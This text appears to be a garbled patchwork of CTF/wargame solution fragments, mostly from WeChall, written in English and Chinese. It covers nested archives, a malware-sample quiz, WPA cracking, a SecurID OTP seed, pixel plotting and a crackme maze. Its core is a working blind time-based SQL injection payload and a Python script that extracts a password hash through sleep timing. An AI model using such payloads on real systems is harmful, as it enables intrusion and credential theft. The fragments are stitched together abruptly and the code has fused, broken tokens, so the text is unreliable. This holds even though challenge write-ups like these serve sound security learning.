eXtract Me (Encoding, Stegano) — score 3, by oleg.
Yo dog, I heard you like zips so we put a zip in your zip so you can
unzip unzipped zips. Enjoy!
Download: r.zip (2698 bytes).
Solution
The challenge is an archive matryoshka: the r.zip
contains an infinite recursive zip (r/r.zip → always the
same inner zip), plus hidden data appended after the ZIP EOCD.
Step 1 — Cut out the second archive
r.zip is actually two things stitched together:
First 440 bytes: the recursive zip (r/r.zip, endless loop)
Remaining 2258 bytes: LZW-compressed data (magic
\x1f\x9d)
Extract the trailing data and decompress with
uncompress:
1 2 3 4 5 6 7 8
$ python3 -c " with open('r.zip','rb') as f: d=f.read() open('trailing.Z','wb').write(d[440:]) " $ uncompress -c trailing.Z > stage1.xar $ file stage1.xar stage1.xar: xar archive compressed TOC
Step 2 — Extract the chain
The XAR contains file "8", which is itself LZW-compressed:
This showcases the depth of archive format history — ZIP, LZW
compress, XAR, RAR, XZ, ZOO, RZIP, GZip, ARJ, 7z, bzip2 — almost every
compression format ever invented.
1. Hi, This is an **\*\*\*\*\*\*\*\*** virus. As you know we are not so technical advanced as in the West. We therefore ask you to delete all your files on your harddisk manually and send this email to all your friends.
2. When you see "Dis is one half" on your screen, half of your hard drive has been encrypted with **\*\*\*** encryption.
3. **\*\*\*\* \*\*\*\*** is a great DNS technique for botherders to avoid shutting down of their malware or phishing site and to hide these sites with an ever-changing network of compromised hosts acting as proxies.
4. Download the source code for netsky.ae (variant name by Kaspersky), in the main.cpp (sha-256sum=e80d5db98e3e661bee9e57e0e524de2b97db2f48c63f2e73c562719501aeddc1) the first host name in the 90. row is www.**\*\*\*\*\***.com
5. After downloading and installing Trojan-PSW.Win32.Sinowal.w (variant name by Kaspersky) (sha-256sum=c21ae31e700930b02ad8c286c098770a1baad33abae6436733bb024998bdd19e), first the malware queries the DNS for r**\*\*\*\*\***.com (include r in the final answer).
6. Download Trojan-GameThief.Win32.Nilage.mc (variant name by Kaspersky) (sha-256sum=d2243520460811f14c7f77dce093b807e546298b6eb3e8d8a8f4581f28057284), unpack and analyze. The executable contains the string: c:\\**\*\*\*\*\***.txt
Your task is to fill in the \* parts, concatenate the answers with \_ (underscore) and remove any spaces (if any). To be more precise, the solution string will contain 5 \_ and altogether 43 characters. You only have to answer 5 out of the 6 questions correctly to be succesfull, but please include every answer (even if one is known wrong).
' or ''='' and ( if(substr(password,1,1)='a', sleep(1.2), 1) and if(substr(password,1,1)='b', sleep(2.4), 1) and ... if(substr(password,1,1)='9', sleep(19.2), 1) )-- -
#!/usr/bin/env python3 """16-level sleep, STEP=1.2, 0.5s delay between requests."""
import requests import re import time import sys from requests.adapters import HTTPAdapter
# 替换为你的 WeChall session cookie C = {'WC': '<your_wechall_cookie>'} U = 'https://www.wechall.net/challenge/blind_lighter/index.php' M = ' abcdef0123456789' S = 1.2# Faster than 1.5, more reliable than 1.0
s = requests.Session() s.headers.update({'User-Agent': 'Mozilla/5.0'}) s.cookies.update(C) s.mount('https://', HTTPAdapter(1, 1, 1))
defpt(b): """Extract PHP Time value from response body.""" m = re.search(r'PHP Time:\s*([\d.]+)s', b) returnfloat(m.group(1)) if m elseNone
defex(pos): """Extract single character at position <pos> using 16-level sleep oracle.""" conds = [ f"if(substr(password,{pos},1)='{M[i]}', sleep({i * S}), 1)" for i inrange(1, 17) ] pl = "' or ''='' and (" + ' and '.join(conds) + ')-- -' t = pt(post({'injection': pl, 'inject': 'Inject'}, 60)) if t isNone: return'?' i = round(t / S) if1 <= i <= 16: return M[i] # Rounding edge case: try ±1 for o in [-1, 1]: if1 <= i + o <= 16: return M[i + o] return'?'
defrd(rn): """Run one round: extract 32-char hash and submit.""" h = '' t0 = time.time() for pos inrange(1, 33): h += ex(pos) if pos % 8 == 0or pos == 32: print(f' R{rn} [{pos}/32] {h} ({time.time() - t0:.0f}s)') sys.stdout.flush() time.sleep(0.5) # Rate limit avoidance t = time.time() - t0 body = post({'thehash': h, 'mybutton': 'Enter'}, 60) if'Your answer is correct'in body: print(f' R{rn} SOLVED!({t:.0f}s)') return's' elif'Wow'in body: print(f' R{rn} OK({t:.0f}s)') return'c' print(f' R{rn} BAD({t:.0f}s) h={h}') return'x'
get(U + '?reset=me') time.sleep(1)
for rn inrange(1, 4): print(f'=== R{rn} ===') sys.stdout.flush() r = rd(rn) if r == 's': print('\nSOLVED!') sys.exit(0) if r == 'x': sys.exit(1) if rn < 3: print(' [cool 10s]') sys.stdout.flush() time.sleep(10)
You woke up for another gray day, and noticed that your bank account
is empty as it is for months. You need some quick easy money, so you
join some "darknet" irc channels in order to speak with people, who are
able to give you some "not fully legal" job. Your new boss wants you to
hack into a small bank infrastructure, and transfer money from one
account to another. Easy job, huh?
You drive with your van to the bank's main office, and setup your
favourite wireless sniffing tool. Wow, it looks like they are using some
WPA network. Let's sniff some data, and try to crack the WPA password
with some dictionary attack.
Bug report: some older versions of aircrack-ng are unable to crack
the password, be sure to use the latest (rc1 is known to be
working).
Good job. Now you have successfully uploaded the new token data for the victims bank account. The base filename is the serial number for the token, and the seed (secret) is d4e3f9eb36c9ebf3. Please note it is an older format of PSA InsecurID, the newer ones are using digitally signed XML files and longer seeds. After you have uploaded the new token data, you have to generate a valid one time password for that token for 27. of July, 2012 14:24 GMT+1
Part 3: RSA SecurID v1 OTP
计算
这是整个挑战最难的部分。需要根据 seed 和指定时间计算 RSA SecurID
一次性密码。
"PSA InsecurID" 是什么
论坛帖子(Z 本人)提示:"PSA InSecurID is really, really clear. Just
change/remove a few letters and it's obvious."
A paranoid friend has sent me a message, but in his paranoid mind he
forgot to tell me how to decode it. If Picasso got a computer he would
know what to do!
每个坐标对格式是 NNxNN,其中 x 范围 10-43,y 范围
10-16。字母(a, d, l,
y...)只是点分隔符,可以全部丢弃。
Step 2: 画图
用任意方式把坐标画成像素:
Python:
1 2 3 4 5 6
grid = {} for x_str, y_str in coords: grid[(int(x_str), int(y_str))] = '#'
for y inrange(10, 17): print(''.join(grid.get((x, y), ' ') for x inrange(10, 44)))
ImageJ(论坛方案):
1 2 3 4 5 6
newImage("Vermeer", "8-bit white", 100, 100, 1); for (i = 1; i < lengthOf(message) - 5; i += 6) { x = parseInt(substring(message, i, i + 2)); y = parseInt(substring(message, i + 3, i + 5)); setPixel(x, y, 0); }
This time we will dive into a small windows application to get you
started with cracking. We are using x64debug and analyze the crackit
"Amaze Me" from bb on TBS.
# 转二维网格:0=路, 1=墙 grid = [] for row inrange(NUM_ROWS): r = [] for col inrange(ROW_WIDTH): b = maze_bytes[row * ROW_WIDTH + col] r.append(1if b != 0else0) grid.append(r)